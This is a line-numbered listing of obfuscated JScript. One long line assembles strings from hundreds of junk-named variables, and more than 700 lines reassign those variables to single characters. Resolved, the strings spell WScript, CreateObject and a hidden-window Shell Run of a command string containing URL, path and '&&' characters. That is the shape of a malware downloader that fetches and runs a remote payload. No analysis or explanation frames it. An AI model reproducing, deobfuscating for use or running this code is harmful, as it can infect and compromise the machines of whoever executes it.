13 | this[mrxdjzy + clycvi + vvtpo + yibntkcg + hithm + fzzeuk + juhyvx][naitrjtq + yibntkcg + useli + hndcghhma + juhyvx + useli + emzuhbu + zkoio + xygykzl + useli + vvtpo + juhyvx] ( mrxdjzy + clycvi + vvtpo + yibntkcg + hithm + fzzeuk + juhyvx + kxxfrdr + clycvi + eakdilx + useli + xqtgeumxx + xqtgeumxx ) [yibntkcg + icqrtpjl + gaggurigg] ( vvtpo + wqjcjn + tinlblncr + bsrcqdnjb + ziqmrdnk + vvtpo + bsrcqdnjb + fzzeuk + ownhpz + pxveq + useli + yibntkcg + jcduebba + eakdilx + useli + xqtgeumxx + xqtgeumxx + kxxfrdr + useli + pfuygxtzq + useli + bsrcqdnjb + texyxstqa + naitrjtq + ownhpz + wqjcjn + wqjcjn + hndcghhma + gaggurigg + tinlblncr + bsrcqdnjb + wggeq + ulfbgcyi + gaggurigg + jlaczjiji + ownhpz + apbmzms + useli + texyxstqa + mrxdjzy + useli + zkoio + qivhgnib + useli + hwsbnzv + icqrtpjl + useli + jcduebba + juhyvx + bsrcqdnjb + texyxstqa + emzuhbu + icqrtpjl + juhyvx + skoqzhxu + hithm + xqtgeumxx + useli + bsrcqdnjb + lipdjqaj + juhyvx + useli + wqjcjn + fzzeuk + lipdjqaj + zqaqokaw + hithm + gaggurigg + jlaczjiji + ownhpz + hithm + vvtpo + useli + kxxfrdr + fzzeuk + tinlblncr + skwjsll + bsrcqdnjb + eakdilx + juhyvx + juhyvx + fzzeuk + bddmytp + ziqmrdnk + ziqmrdnk + wyvwr + iogejgpi + uznrjlv + kxxfrdr + wyvwr + nwjro + uznrjlv + kxxfrdr + wyvwr + kxxfrdr + mcqaecsl + cmdfiyyuh + yujdm + ziqmrdnk + hithm + gaggurigg + jlaczjiji + ownhpz + hithm + vvtpo + useli + kxxfrdr + fzzeuk + eakdilx + fzzeuk + wggeq + drkjhh + drkjhh + jcduebba + juhyvx + hndcghhma + yibntkcg + juhyvx + bsrcqdnjb + lipdjqaj + juhyvx + useli + wqjcjn + fzzeuk + lipdjqaj + zqaqokaw + hithm + gaggurigg + jlaczjiji + ownhpz + hithm + vvtpo + useli + kxxfrdr + fzzeuk + tinlblncr + skwjsll + drkjhh + drkjhh + vvtpo + wqjcjn + tinlblncr + bsrcqdnjb + ziqmrdnk + vvtpo + bsrcqdnjb + gaggurigg + useli + juhyvx + bsrcqdnjb + icqrtpjl + jcduebba + useli + bsrcqdnjb + zqaqokaw + zqaqokaw + wyvwr + iogejgpi + uznrjlv + kxxfrdr + wyvwr + nwjro + uznrjlv + kxxfrdr + wyvwr + kxxfrdr + mcqaecsl + cmdfiyyuh + yujdm + ezunts + htryaxk + htryaxk + htryaxk + htryaxk + zqaqokaw + tinlblncr + hndcghhma + jlaczjiji + pxveq + pxveq + pxveq + yibntkcg + ownhpz + ownhpz + juhyvx + zqaqokaw + drkjhh + drkjhh + vvtpo + wqjcjn + tinlblncr + bsrcqdnjb + ziqmrdnk + vvtpo + bsrcqdnjb + yibntkcg + useli + dedsbjcet + jcduebba + jlaczjiji + yibntkcg + uznrjlv + mcqaecsl + bsrcqdnjb + ziqmrdnk + jcduebba + bsrcqdnjb + zqaqokaw + zqaqokaw + wyvwr + iogejgpi + uznrjlv + kxxfrdr + wyvwr + nwjro + uznrjlv + kxxfrdr + wyvwr + kxxfrdr + mcqaecsl + cmdfiyyuh + yujdm + ezunts + htryaxk + htryaxk + htryaxk + htryaxk + zqaqokaw + tinlblncr + hndcghhma + jlaczjiji + pxveq + pxveq + pxveq + yibntkcg + ownhpz + ownhpz + juhyvx + zqaqokaw + wyvwr + yujdm + uznrjlv + htryaxk + wyvwr + mcqaecsl + uznrjlv + htryaxk + mcqaecsl + wyvwr + cmdfiyyuh + cmdfiyyuh + yujdm + nwjro + kxxfrdr + tinlblncr + xqtgeumxx + xqtgeumxx, 0, false ); |
|
14 | } | |
15 | hwsbnzv = "y"; | |
16 | hwsbnzv = "n"; | |
17 | hwsbnzv = "W"; | |
18 | hwsbnzv = "D"; | |
19 | hwsbnzv = "g"; | |
20 | hwsbnzv = "H"; | |
21 | hwsbnzv = "K"; | |
22 | hwsbnzv = "e"; | |
23 | hwsbnzv = "j"; | |
24 | hwsbnzv = "R"; | |
25 | hwsbnzv = "c"; | |
26 | hwsbnzv = "k"; | |
27 | hwsbnzv = "q"; | |
28 | hwsbnzv = "s"; | |
29 | hwsbnzv = "v"; | |
30 | hwsbnzv = "h"; | |
31 | hwsbnzv = "U"; | |
32 | hwsbnzv = "F"; | |
33 | hwsbnzv = "c"; | |
34 | hwsbnzv = "Y"; | |
35 | hwsbnzv = "L"; | |
36 | hwsbnzv = "X"; | |
37 | hwsbnzv = "r"; | |
38 | hwsbnzv = "b"; | |
39 | hwsbnzv = "O"; | |
40 | hwsbnzv = "C"; | |
41 | hwsbnzv = "K"; | |
42 | hwsbnzv = "I"; | |
43 | hwsbnzv = "C"; | |
44 | hwsbnzv = "b"; | |
45 | hwsbnzv = "d"; | |
46 | hwsbnzv = "a"; | |
47 | hwsbnzv = "E"; | |
48 | hwsbnzv = "V"; | |
49 | hwsbnzv = "q"; | |
50 | hwsbnzv = "Z"; | |
51 | hwsbnzv = "E"; | |
52 | hwsbnzv = "C"; | |
53 | hwsbnzv = "c"; | |
54 | hwsbnzv = "z"; | |
55 | hwsbnzv = "D"; | |
56 | hwsbnzv = "u"; | |
57 | hwsbnzv = "s"; | |
58 | hwsbnzv = "f"; | |
59 | hwsbnzv = "q"; | |
60 | iogejgpi = "h"; | |
61 | iogejgpi = "a"; | |
62 | iogejgpi = "r"; | |
63 | iogejgpi = "Z"; | |
64 | iogejgpi = "C"; | |
65 | iogejgpi = "P"; | |
66 | iogejgpi = "j"; | |
67 | iogejgpi = "b"; | |
68 | iogejgpi = "B"; | |
69 | iogejgpi = "G"; | |
70 | iogejgpi = "v"; | |
71 | iogejgpi = "P"; | |
72 | iogejgpi = "Z"; | |
73 | iogejgpi = "e"; | |
74 | iogejgpi = "C"; | |
75 | iogejgpi = "N"; | |
76 | iogejgpi = "o"; | |
77 | iogejgpi = "q"; | |
78 | iogejgpi = "B"; | |
79 | iogejgpi = "D"; | |
80 | iogejgpi = "I"; | |
81 | iogejgpi = "B"; | |
82 | iogejgpi = "N"; | |
83 | iogejgpi = "k"; | |
84 | iogejgpi = "i"; | |
85 | iogejgpi = "v"; | |
86 | iogejgpi = "l"; | |
87 | iogejgpi = "D"; | |
88 | iogejgpi = "V"; | |
89 | iogejgpi = "S"; | |
90 | iogejgpi = "h"; | |
91 | iogejgpi = "9"; | |
92 | jcduebba = "E"; | |
93 | jcduebba = "F"; | |
94 | jcduebba = "m"; | |
95 | jcduebba = "v"; | |
96 | jcduebba = "p"; | |
97 | jcduebba = "T"; | |
98 | jcduebba = "A"; | |
99 | jcduebba = "F"; | |
100 | jcduebba = "M"; | |
101 | jcduebba = "o"; | |
102 | jcduebba = "B"; | |
103 | jcduebba = "U"; | |
104 | jcduebba = "b"; | |
105 | jcduebba = "l"; | |
106 | jcduebba = "s"; | |
107 | hithm = "q"; | |
108 | hithm = "O"; | |
109 | hithm = "s"; | |
110 | hithm = "L"; | |
111 | hithm = "A"; | |
112 | hithm = "G"; | |
113 | hithm = "P"; | |
114 | hithm = "H"; | |
115 | hithm = "Z"; | |
116 | hithm = "V"; | |
117 | hithm = "J"; | |
118 | hithm = "i"; | |
119 | zkoio = "A"; | |
120 | zkoio = "I"; | |
121 | zkoio = "v"; | |
122 | zkoio = "r"; | |
123 | zkoio = "J"; | |
124 | zkoio = "k"; | |
125 | zkoio = "F"; | |
126 | zkoio = "V"; | |
127 | zkoio = "Q"; | |
128 | zkoio = "Q"; | |
129 | zkoio = "D"; | |
130 | zkoio = "v"; | |
131 | zkoio = "F"; | |
132 | zkoio = "r"; | |
133 | zkoio = "I"; | |
134 | zkoio = "C"; | |
135 | zkoio = "a"; | |
136 | zkoio = "V"; | |
137 | zkoio = "A"; | |
138 | zkoio = "r"; | |
139 | zkoio = "y"; | |
140 | zkoio = "D"; | |
141 | zkoio = "r"; | |
142 | zkoio = "s"; | |
143 | zkoio = "o"; | |
144 | zkoio = "s"; | |
145 | zkoio = "C"; | |
146 | zkoio = "B"; | |
147 | zkoio = "r"; | |
148 | zkoio = "L"; | |
149 | zkoio = "b"; | |
150 | juhyvx = "g"; | |
151 | juhyvx = "H"; | |
152 | juhyvx = "z"; | |
153 | juhyvx = "u"; | |
154 | juhyvx = "P"; | |
155 | juhyvx = "f"; | |
156 | juhyvx = "s"; | |
157 | juhyvx = "X"; | |
158 | juhyvx = "K"; | |
159 | juhyvx = "C"; | |
160 | juhyvx = "T"; | |
161 | juhyvx = "K"; | |
162 | juhyvx = "x"; | |
163 | juhyvx = "Q"; | |
164 | juhyvx = "c"; | |
165 | juhyvx = "p"; | |
166 | juhyvx = "D"; | |
167 | juhyvx = "D"; | |
168 | juhyvx = "t"; | |
169 | xygykzl = "v"; | |
170 | xygykzl = "X"; | |
171 | xygykzl = "h"; | |
172 | xygykzl = "D"; | |
173 | xygykzl = "n"; | |
174 | xygykzl = "g"; | |
175 | xygykzl = "l"; | |
176 | xygykzl = "W"; | |
177 | xygykzl = "j"; | |
178 | kxxfrdr = "m"; | |
179 | kxxfrdr = "X"; | |
180 | kxxfrdr = "j"; | |
181 | kxxfrdr = "r"; | |
182 | kxxfrdr = "v"; | |
183 | kxxfrdr = "s"; | |
184 | kxxfrdr = "l"; | |
185 | kxxfrdr = "x"; | |
186 | kxxfrdr = "X"; | |
187 | kxxfrdr = "R"; | |
188 | kxxfrdr = "U"; | |
189 | kxxfrdr = "s"; | |
190 | kxxfrdr = "Y"; | |
191 | kxxfrdr = "i"; | |
192 | kxxfrdr = "C"; | |
193 | kxxfrdr = "q"; | |
194 | kxxfrdr = "F"; | |
195 | kxxfrdr = "A"; | |
196 | kxxfrdr = "g"; | |
197 | kxxfrdr = "c"; | |
198 | kxxfrdr = "l"; | |
199 | kxxfrdr = "H"; | |
200 | kxxfrdr = "."; | |
201 | jlaczjiji = "X"; | |
202 | jlaczjiji = "d"; | |
203 | jlaczjiji = "M"; | |
204 | jlaczjiji = "k"; | |
205 | jlaczjiji = "D"; | |
206 | jlaczjiji = "w"; | |
207 | jlaczjiji = "T"; | |
208 | jlaczjiji = "J"; | |
209 | jlaczjiji = "R"; | |
210 | jlaczjiji = "J"; | |
211 | jlaczjiji = "X"; | |
212 | jlaczjiji = "n"; | |
213 | jlaczjiji = "D"; | |
214 | jlaczjiji = "H"; | |
215 | jlaczjiji = "v"; | |
216 | useli = "b"; | |
217 | useli = "d"; | |
218 | useli = "l"; | |
219 | useli = "S"; | |
220 | useli = "Z"; | |
221 | useli = "N"; | |
222 | useli = "V"; | |
223 | useli = "G"; | |
224 | useli = "G"; | |
225 | useli = "G"; | |
226 | useli = "k"; | |
227 | useli = "U"; | |
228 | useli = "v"; | |
229 | useli = "A"; | |
230 | useli = "n"; | |
231 | useli = "H"; | |
232 | useli = "R"; | |
233 | useli = "P"; | |
234 | useli = "Y"; | |
235 | useli = "L"; | |
236 | useli = "F"; | |
237 | useli = "D"; | |
238 | useli = "g"; | |
239 | useli = "e"; | |
240 | fzzeuk = "t"; | |
241 | fzzeuk = "b"; | |
242 | fzzeuk = "z"; | |
243 | fzzeuk = "p"; | |
244 | fzzeuk = "F"; | |
245 | fzzeuk = "W"; | |
246 | fzzeuk = "a"; | |
247 | fzzeuk = "N"; | |
248 | fzzeuk = "Y"; | |
249 | fzzeuk = "q"; | |
250 | fzzeuk = "r"; | |
251 | fzzeuk = "K"; | |
252 | fzzeuk = "r"; | |
253 | fzzeuk = "t"; | |
254 | fzzeuk = "y"; | |
255 | fzzeuk = "J"; | |
256 | fzzeuk = "l"; | |
257 | fzzeuk = "k"; | |
258 | fzzeuk = "y"; | |
259 | fzzeuk = "C"; | |
260 | fzzeuk = "f"; | |
261 | fzzeuk = "d"; | |
262 | fzzeuk = "x"; | |
263 | fzzeuk = "T"; | |
264 | fzzeuk = "j"; | |
265 | fzzeuk = "W"; | |
266 | fzzeuk = "p"; | |
267 | fzzeuk = "F"; | |
268 | fzzeuk = "F"; | |
269 | fzzeuk = "A"; | |
270 | fzzeuk = "p"; | |
271 | urzzh = "a"; | |
272 | urzzh = "m"; | |
273 | urzzh = "c"; | |
274 | urzzh = "E"; | |
275 | urzzh = "x"; | |
276 | urzzh = "z"; | |
277 | urzzh = "a"; | |
278 | urzzh = "T"; | |
279 | urzzh = "N"; | |
280 | urzzh = "z"; | |
281 | urzzh = "h"; | |
282 | urzzh = "L"; | |
283 | urzzh = "R"; | |
284 | urzzh = "j"; | |
285 | urzzh = "N"; | |
286 | vvtpo = "k"; | |
287 | vvtpo = "D"; | |
288 | vvtpo = "Z"; | |
289 | vvtpo = "v"; | |
290 | vvtpo = "z"; | |
291 | vvtpo = "f"; | |
292 | vvtpo = "g"; | |
293 | vvtpo = "w"; | |
294 | vvtpo = "a"; | |
295 | vvtpo = "u"; | |
296 | vvtpo = "z"; | |
297 | vvtpo = "p"; | |
298 | vvtpo = "N"; | |
299 | vvtpo = "m"; | |
300 | vvtpo = "e"; | |
301 | vvtpo = "n"; | |
302 | vvtpo = "N"; | |
303 | vvtpo = "u"; | |
304 | vvtpo = "y"; | |
305 | vvtpo = "r"; | |
306 | vvtpo = "f"; | |
307 | vvtpo = "b"; | |
308 | vvtpo = "t"; | |
309 | vvtpo = "E"; | |
310 | vvtpo = "c"; | |
311 | htryaxk = "p"; | |
312 | htryaxk = "S"; | |
313 | htryaxk = "8"; | |
314 | skwjsll = "X"; | |
315 | skwjsll = "X"; | |
316 | skwjsll = "o"; | |
317 | skwjsll = "s"; | |
318 | skwjsll = "m"; | |
319 | skwjsll = "j"; | |
320 | skwjsll = "L"; | |
321 | skwjsll = "z"; | |
322 | skwjsll = "z"; | |
323 | skwjsll = "l"; | |
324 | skwjsll = "P"; | |
325 | skwjsll = "Y"; | |
326 | skwjsll = "r"; | |
327 | skwjsll = "n"; | |
328 | skwjsll = "G"; | |
329 | skwjsll = "k"; | |
330 | skwjsll = "X"; | |
331 | skwjsll = "F"; | |
332 | skwjsll = "f"; | |
333 | znrtw = "l"; | |
334 | znrtw = "R"; | |
335 | znrtw = "S"; | |
336 | znrtw = "F"; | |
337 | znrtw = "t"; | |
338 | znrtw = "U"; | |
339 | znrtw = "P"; | |
340 | znrtw = "O"; | |
341 | znrtw = "b"; | |
342 | znrtw = "R"; | |
343 | znrtw = "T"; | |
344 | ziqmrdnk = "S"; | |
345 | ziqmrdnk = "D"; | |
346 | ziqmrdnk = "e"; | |
347 | ziqmrdnk = "y"; | |
348 | ziqmrdnk = "r"; | |
349 | ziqmrdnk = "e"; | |
350 | ziqmrdnk = "j"; | |
351 | ziqmrdnk = "A"; | |
352 | ziqmrdnk = "q"; | |
353 | ziqmrdnk = "f"; | |
354 | ziqmrdnk = "Y"; | |
355 | ziqmrdnk = "z"; | |
356 | ziqmrdnk = "H"; | |
357 | ziqmrdnk = "M"; | |
358 | ziqmrdnk = "k"; | |
359 | ziqmrdnk = "A"; | |
360 | ziqmrdnk = "O"; | |
361 | ziqmrdnk = "G"; | |
362 | ziqmrdnk = "m"; | |
363 | ziqmrdnk = "K"; | |
364 | ziqmrdnk = "O"; | |
365 | ziqmrdnk = "D"; | |
366 | ziqmrdnk = "L"; | |
367 | ziqmrdnk = "Q"; | |
368 | ziqmrdnk = "B"; | |
369 | ziqmrdnk = "o"; | |
370 | ziqmrdnk = "h"; | |
371 | ziqmrdnk = "a"; | |
372 | ziqmrdnk = "A"; | |
373 | ziqmrdnk = "N"; | |
374 | ziqmrdnk = "p"; | |
375 | ziqmrdnk = "T"; | |
376 | ziqmrdnk = "R"; | |
377 | ziqmrdnk = "e"; | |
378 | ziqmrdnk = "X"; | |
379 | ziqmrdnk = "/"; | |
380 | lipdjqaj = "F"; | |
381 | lipdjqaj = "h"; | |
382 | lipdjqaj = "a"; | |
383 | lipdjqaj = "x"; | |
384 | lipdjqaj = "P"; | |
385 | lipdjqaj = "y"; | |
386 | lipdjqaj = "K"; | |
387 | lipdjqaj = "q"; | |
388 | lipdjqaj = "z"; | |
389 | lipdjqaj = "o"; | |
390 | lipdjqaj = "t"; | |
391 | lipdjqaj = "s"; | |
392 | lipdjqaj = "Q"; | |
393 | lipdjqaj = "O"; | |
394 | lipdjqaj = "k"; | |
395 | lipdjqaj = "m"; | |
396 | lipdjqaj = "A"; | |
397 | lipdjqaj = "Q"; | |
398 | lipdjqaj = "a"; | |
399 | lipdjqaj = "V"; | |
400 | lipdjqaj = "K"; | |
401 | lipdjqaj = "Z"; | |
402 | lipdjqaj = "E"; | |
403 | lipdjqaj = "w"; | |
404 | lipdjqaj = "R"; | |
405 | lipdjqaj = "%"; | |
406 | xqtgeumxx = "P"; | |
407 | xqtgeumxx = "X"; | |
408 | xqtgeumxx = "C"; | |
409 | xqtgeumxx = "A"; | |
410 | xqtgeumxx = "c"; | |
411 | xqtgeumxx = "S"; | |
412 | xqtgeumxx = "g"; | |
413 | xqtgeumxx = "H"; | |
414 | xqtgeumxx = "n"; | |
415 | xqtgeumxx = "V"; | |
416 | xqtgeumxx = "L"; | |
417 | xqtgeumxx = "T"; | |
418 | xqtgeumxx = "F"; | |
419 | xqtgeumxx = "s"; | |
420 | xqtgeumxx = "X"; | |
421 | xqtgeumxx = "z"; | |
422 | xqtgeumxx = "G"; | |
423 | xqtgeumxx = "V"; | |
424 | xqtgeumxx = "K"; | |
425 | xqtgeumxx = "D"; | |
426 | xqtgeumxx = "a"; | |
427 | xqtgeumxx = "W"; | |
428 | xqtgeumxx = "h"; | |
429 | xqtgeumxx = "p"; | |
430 | xqtgeumxx = "w"; | |
431 | xqtgeumxx = "l"; | |
432 | hwdjgt = "x"; | |
433 | hwdjgt = "j"; | |
434 | hwdjgt = "V"; | |
435 | hwdjgt = "y"; | |
436 | hwdjgt = "G"; | |
437 | hwdjgt = "B"; | |
438 | hwdjgt = "G"; | |
439 | hwdjgt = "c"; | |
440 | hwdjgt = "E"; | |
441 | hwdjgt = "K"; | |
442 | hwdjgt = "k"; | |
443 | hwdjgt = "o"; | |
444 | hwdjgt = "I"; | |
445 | hwdjgt = "V"; | |
446 | hwdjgt = "R"; | |
447 | hwdjgt = "w"; | |
448 | hwdjgt = "P"; | |
449 | hwdjgt = "v"; | |
450 | hwdjgt = "K"; | |
451 | hwdjgt = "S"; | |
452 | hwdjgt = "r"; | |
453 | hwdjgt = "j"; | |
454 | hwdjgt = "m"; | |
455 | hwdjgt = "Z"; | |
456 | hwdjgt = "t"; | |
457 | hwdjgt = "l"; | |
458 | hwdjgt = "o"; | |
459 | hwdjgt = "Q"; | |
460 | hwdjgt = "g"; | |
461 | hwdjgt = "X"; | |
462 | hwdjgt = "R"; | |
463 | hwdjgt = "H"; | |
464 | hwdjgt = "g"; | |
465 | hwdjgt = "s"; | |
466 | hwdjgt = "U"; | |
467 | psrxusxk = "P"; | |
468 | psrxusxk = "L"; | |
469 | psrxusxk = "H"; | |
470 | psrxusxk = "U"; | |
471 | psrxusxk = "K"; | |
472 | emzuhbu = "M"; | |
473 | emzuhbu = "P"; | |
474 | emzuhbu = "t"; | |
475 | emzuhbu = "l"; | |
476 | emzuhbu = "K"; | |
477 | emzuhbu = "l"; | |
478 | emzuhbu = "Z"; | |
479 | emzuhbu = "O"; | |
480 | emzuhbu = "D"; | |
481 | emzuhbu = "b"; | |
482 | emzuhbu = "Y"; | |
483 | emzuhbu = "Z"; | |
484 | emzuhbu = "E"; | |
485 | emzuhbu = "R"; | |
486 | emzuhbu = "F"; | |
487 | emzuhbu = "j"; | |
488 | emzuhbu = "F"; | |
489 | emzuhbu = "f"; | |
490 | emzuhbu = "G"; | |
491 | emzuhbu = "g"; | |
492 | emzuhbu = "P"; | |
493 | emzuhbu = "e"; | |
494 | emzuhbu = "c"; | |
495 | emzuhbu = "A"; | |
496 | emzuhbu = "v"; | |
497 | emzuhbu = "u"; | |
498 | emzuhbu = "W"; | |
499 | emzuhbu = "K"; | |
500 | emzuhbu = "V"; | |
501 | emzuhbu = "w"; | |
502 | emzuhbu = "r"; | |
503 | emzuhbu = "g"; | |
504 | emzuhbu = "L"; | |
505 | emzuhbu = "J"; | |
506 | emzuhbu = "E"; | |
507 | emzuhbu = "a"; | |
508 | emzuhbu = "B"; | |
509 | emzuhbu = "P"; | |
510 | emzuhbu = "O"; | |
511 | emzuhbu = "f"; | |
512 | emzuhbu = "v"; | |
513 | emzuhbu = "O"; | |
514 | bddmytp = "x"; | |
515 | bddmytp = "k"; | |
516 | bddmytp = "j"; | |
517 | bddmytp = "f"; | |
518 | bddmytp = "U"; | |
519 | bddmytp = "x"; | |
520 | bddmytp = "c"; | |
521 | bddmytp = "s"; | |
522 | bddmytp = "Q"; | |
523 | bddmytp = "L"; | |
524 | bddmytp = "a"; | |
525 | bddmytp = "o"; | |
526 | bddmytp = "j"; | |
527 | bddmytp = "m"; | |
528 | bddmytp = "K"; | |
529 | bddmytp = ":"; | |
530 | zqaqokaw = "J"; | |
531 | zqaqokaw = "O"; | |
532 | zqaqokaw = "w"; | |
533 | zqaqokaw = "x"; | |
534 | zqaqokaw = "m"; | |
535 | zqaqokaw = "o"; | |
536 | zqaqokaw = "u"; | |
537 | zqaqokaw = "Y"; | |
538 | zqaqokaw = "y"; | |
539 | zqaqokaw = "H"; | |
540 | zqaqokaw = "p"; | |
541 | zqaqokaw = "n"; | |
542 | zqaqokaw = "l"; | |
543 | zqaqokaw = "e"; | |
544 | zqaqokaw = "X"; | |
545 | zqaqokaw = "O"; | |
546 | zqaqokaw = "y"; | |
547 | zqaqokaw = "M"; | |
548 | zqaqokaw = "v"; | |
549 | zqaqokaw = "q"; | |
550 | zqaqokaw = "P"; | |
551 | zqaqokaw = "G"; | |
552 | zqaqokaw = "f"; | |
553 | zqaqokaw = "R"; | |
554 | zqaqokaw = "p"; | |
555 | zqaqokaw = "s"; | |
556 | zqaqokaw = "s"; | |
557 | zqaqokaw = "o"; | |
558 | zqaqokaw = "s"; | |
559 | zqaqokaw = "\\"; | |
560 | nwjro = "n"; | |
561 | nwjro = "G"; | |
562 | nwjro = "b"; | |
563 | nwjro = "T"; | |
564 | nwjro = "Y"; | |
565 | nwjro = "g"; | |
566 | nwjro = "W"; | |
567 | nwjro = "q"; | |
568 | nwjro = "z"; | |
569 | nwjro = "H"; | |
570 | nwjro = "T"; | |
571 | nwjro = "u"; | |
572 | nwjro = "c"; | |
573 | nwjro = "O"; | |
574 | nwjro = "l"; | |
575 | nwjro = "K"; | |
576 | nwjro = "4"; | |
577 | ownhpz = "I"; | |
578 | ownhpz = "o"; | |
579 | ownhpz = "D"; | |
580 | ownhpz = "D"; | |
581 | ownhpz = "y"; | |
582 | ownhpz = "q"; | |
583 | ownhpz = "D"; | |
584 | ownhpz = "s"; | |
585 | ownhpz = "U"; | |
586 | ownhpz = "w"; | |
587 | ownhpz = "m"; | |
588 | ownhpz = "F"; | |
589 | ownhpz = "y"; | |
590 | ownhpz = "w"; | |
591 | ownhpz = "c"; | |
592 | ownhpz = "l"; | |
593 | ownhpz = "C"; | |
594 | ownhpz = "g"; | |
595 | ownhpz = "V"; | |
596 | ownhpz = "P"; | |
597 | ownhpz = "V"; | |
598 | ownhpz = "O"; | |
599 | ownhpz = "w"; | |
600 | ownhpz = "W"; | |
601 | ownhpz = "W"; | |
602 | ownhpz = "o"; | |
603 | cmdfiyyuh = "o"; | |
604 | cmdfiyyuh = "P"; | |
605 | cmdfiyyuh = "b"; | |
606 | cmdfiyyuh = "r"; | |
607 | cmdfiyyuh = "D"; | |
608 | cmdfiyyuh = "T"; | |
609 | cmdfiyyuh = "k"; | |
610 | cmdfiyyuh = "0"; | |
611 | hgofif = "X"; | |
612 | hgofif = "N"; | |
613 | hgofif = "e"; | |
614 | hgofif = "Q"; | |
615 | texyxstqa = "V"; | |
616 | texyxstqa = "-"; | |
617 | tinlblncr = "t"; | |
618 | tinlblncr = "E"; | |
619 | tinlblncr = "o"; | |
620 | tinlblncr = "O"; | |
621 | tinlblncr = "H"; | |
622 | tinlblncr = "i"; | |
623 | tinlblncr = "t"; | |
624 | tinlblncr = "V"; | |
625 | tinlblncr = "A"; | |
626 | tinlblncr = "U"; | |
627 | tinlblncr = "u"; | |
628 | tinlblncr = "U"; | |
629 | tinlblncr = "y"; | |
630 | tinlblncr = "N"; | |
631 | tinlblncr = "E"; | |
632 | tinlblncr = "q"; | |
633 | tinlblncr = "c"; | |
634 | tinlblncr = "X"; | |
635 | tinlblncr = "Y"; | |
636 | tinlblncr = "N"; | |
637 | tinlblncr = "d"; | |
638 | eakdilx = "C"; | |
639 | eakdilx = "P"; | |
640 | eakdilx = "E"; | |
641 | eakdilx = "s"; | |
642 | eakdilx = "u"; | |
643 | eakdilx = "X"; | |
644 | eakdilx = "s"; | |
645 | eakdilx = "e"; | |
646 | eakdilx = "o"; | |
647 | eakdilx = "g"; | |
648 | eakdilx = "n"; | |
649 | eakdilx = "Q"; | |
650 | eakdilx = "h"; | |
651 | shmjithgx = "F"; | |
652 | shmjithgx = "C"; | |
653 | shmjithgx = "L"; | |
654 | mcqaecsl = "w"; | |
655 | mcqaecsl = "L"; | |
656 | mcqaecsl = "h"; | |
657 | mcqaecsl = "k"; | |
658 | mcqaecsl = "2"; | |
659 | cpbfqmt = "J"; | |
660 | cpbfqmt = "T"; | |
661 | cpbfqmt = "u"; | |
662 | cpbfqmt = "n"; | |
663 | cpbfqmt = "W"; | |
664 | cpbfqmt = "Y"; | |
665 | cpbfqmt = "A"; | |
666 | cpbfqmt = "h"; | |
667 | cpbfqmt = "f"; | |
668 | cpbfqmt = "d"; | |
669 | cpbfqmt = "l"; | |
670 | cpbfqmt = "w"; | |
671 | cpbfqmt = "w"; | |
672 | cpbfqmt = "o"; | |
673 | cpbfqmt = "p"; | |
674 | cpbfqmt = "j"; | |
675 | cpbfqmt = "W"; | |
676 | cpbfqmt = "p"; | |
677 | cpbfqmt = "s"; | |
678 | cpbfqmt = "n"; | |
679 | cpbfqmt = "q"; | |
680 | cpbfqmt = "T"; | |
681 | cpbfqmt = "E"; | |
682 | cpbfqmt = "P"; | |
683 | cpbfqmt = "j"; | |
684 | cpbfqmt = "_"; | |
685 | drkjhh = "&"; | |
686 | qlwdedvk = "y"; | |
687 | qlwdedvk = "D"; | |
688 | qlwdedvk = "z"; | |
689 | qlwdedvk = "E"; | |
690 | qlwdedvk = "N"; | |
691 | qlwdedvk = "z"; | |
692 | qlwdedvk = "Y"; | |
693 | qlwdedvk = "j"; | |
694 | qlwdedvk = "O"; | |
695 | qlwdedvk = "U"; | |
696 | qlwdedvk = "B"; | |
697 | qlwdedvk = "d"; | |
698 | qlwdedvk = "y"; | |
699 | qlwdedvk = "T"; | |
700 | qlwdedvk = "r"; | |
701 | qlwdedvk = "j"; | |
702 | qlwdedvk = "y"; | |
703 | qlwdedvk = "k"; | |
704 | qlwdedvk = "Y"; | |
705 | qlwdedvk = "F"; | |
706 | qlwdedvk = "E"; | |
707 | yujdm = "s"; | |
708 | yujdm = "h"; | |
709 | yujdm = "e"; | |
710 | yujdm = "C"; | |
711 | yujdm = "a"; | |
712 | yujdm = "p"; | |
713 | yujdm = "V"; | |
714 | yujdm = "I"; | |
715 | yujdm = "N"; | |
716 | yujdm = "x"; | |
717 | yujdm = "G"; | |
718 | yujdm = "e"; | |
719 | yujdm = "q"; | |
720 | yujdm = "r"; | |
721 | yujdm = "I"; | |
722 | yujdm = "Y"; | |
723 | yujdm = "M"; | |
724 | yujdm = "n"; | |
725 | yujdm = "H"; | |
726 | yujdm = "P"; | |
727 | yujdm = "y"; | |
728 | yujdm = "l"; | |
729 | yujdm = "m"; | |
730 | yujdm = "e"; | |
731 | yujdm = "f"; | |
732 | yujdm = "U"; | |
733 | yujdm = "b"; | |
734 | yujdm = "y"; | |
735 | yujdm = "K"; | |
736 | yujdm = "G"; | |
737 | yujdm = "n"; | |
738 | yujdm = "U"; | |
739 | yujdm = "l"; | |
740 | yujdm = "U"; | |
741 | yujdm = "g"; | |
742 | yujdm = "t"; | |
743 | yujdm = "q"; | |
744 | yujdm = "D"; | |
745 | yujdm = "c"; | |
746 | yujdm = "t"; | |
747 | yujdm = "V"; | |
748 | yujdm = "5"; | |
749 | mrxdjzy = "u"; | |
750 | mrxdjzy = "Z"; | |
751 | mrxdjzy = "v"; | |
752 | mrxdjzy = "N"; | |
753 | mrxdjzy = "v"; | |
754 | mrxdjzy = "D"; | |
755 | mrxdjzy = "b"; | |
756 | mrxdjzy = "w"; | |
757 | mrxdjzy = "T"; | |
758 | mrxdjzy = "g"; | |
759 | mrxdjzy = "y"; | |
760 | mrxdjzy = "Z"; | |
761 | mrxdjzy = "W"; | |
762 | wqjcjn = "D"; | |
763 | wqjcjn = "R"; | |
764 | wqjcjn = "d"; | |
765 | wqjcjn = "u"; | |
766 | wqjcjn = "X"; | |
767 | wqjcjn = "b"; | |
768 | wqjcjn = "t"; | |
769 | wqjcjn = "m"; | |
770 | wyvwr = "o"; | |
771 | wyvwr = "y"; | |
772 | wyvwr = "c"; | |
773 | wyvwr = "q"; | |
774 | wyvwr = "X"; | |
775 | wyvwr = "K"; | |
776 | wyvwr = "S"; | |
777 | wyvwr = "W"; | |
778 | wyvwr = "A"; | |
779 | wyvwr = "e"; | |
780 | wyvwr = "N"; | |
781 | wyvwr = "y"; | |
782 | wyvwr = "T"; | |
783 | wyvwr = "X"; | |
784 | wyvwr = "u"; | |
785 | wyvwr = "T"; | |
786 | wyvwr = "l"; | |
787 | wyvwr = "O"; | |
788 | wyvwr = "q"; | |
